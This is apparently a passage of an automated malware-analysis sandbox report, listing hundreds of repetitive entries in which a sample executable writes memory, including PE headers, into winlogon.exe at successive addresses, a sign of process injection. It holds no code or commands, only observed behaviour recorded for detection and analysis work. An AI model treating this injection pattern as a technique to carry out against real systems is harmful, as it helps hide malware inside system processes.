Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D4A0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D4C0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D4E0000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D500000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D520000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D540000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D560000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D580000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: D5A0000 value starts with: 4D5AJump to behavior
Writes to foreign memory regionsShow sources
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: 400000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: 401000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: 416000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: 419000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: 41B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C940000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C941000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C956000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C959000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C95B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C960000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C961000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C976000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C979000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C97B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C980000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C981000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C996000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C999000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C99B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C9A0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C9A1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C9B6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C9B9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C9BB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C9C0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C9C1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C9D6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C9D9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C9DB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C9E0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C9E1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C9F6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C9F9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: C9FB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA00000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA01000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA16000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA19000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA1B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA20000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA21000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA36000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA39000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA3B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA40000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA41000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA56000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA59000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA5B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA60000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA61000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA76000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA79000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA7B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA80000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA81000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA96000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA99000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CA9B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAA0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAA1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAB6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAB9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CABB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAC0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAC1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAD6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAD9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CADB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAE0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAE1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAF6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAF9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CAFB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB00000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB01000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB16000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB19000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB1B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB20000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB21000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB36000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB39000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB3B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB40000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB41000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB56000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB59000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB5B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB60000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB61000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB76000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB79000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB7B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB80000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB81000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB96000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB99000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CB9B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBA0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBA1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBB6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBB9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBBB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBC0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBC1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBD6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBD9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBDB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBE0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBE1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBF6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBF9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CBFB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC00000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC01000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC16000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC19000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC1B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC20000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC21000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC36000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC39000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC3B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC40000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC41000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC56000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC59000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC5B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC60000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC61000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC76000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC79000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC7B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC80000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC81000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC96000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC99000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CC9B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCA0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCA1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCB6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCB9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCBB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCC0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCC1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCD6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCD9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCDB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCE0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCE1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCF6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCF9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CCFB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD00000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD01000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD16000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD19000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD1B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD20000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD21000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD36000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD39000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD3B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD40000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD41000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD56000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD59000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD5B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD60000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD61000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD76000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD79000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD7B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD80000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD81000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD96000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD99000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CD9B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDA0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDA1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDB6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDB9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDBB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDC0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDC1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDD6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDD9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDDB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDE0000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDE1000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDF6000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDF9000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CDFB000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE00000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE01000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE16000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE19000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE1B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE20000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE21000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE36000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE39000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE3B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE40000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE41000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE56000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE59000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE5B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE60000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE61000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE76000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE79000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE7B000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE80000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE81000Jump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory written: C:\Windows\System32\winlogon.exe base: CE96000Jump to behavior
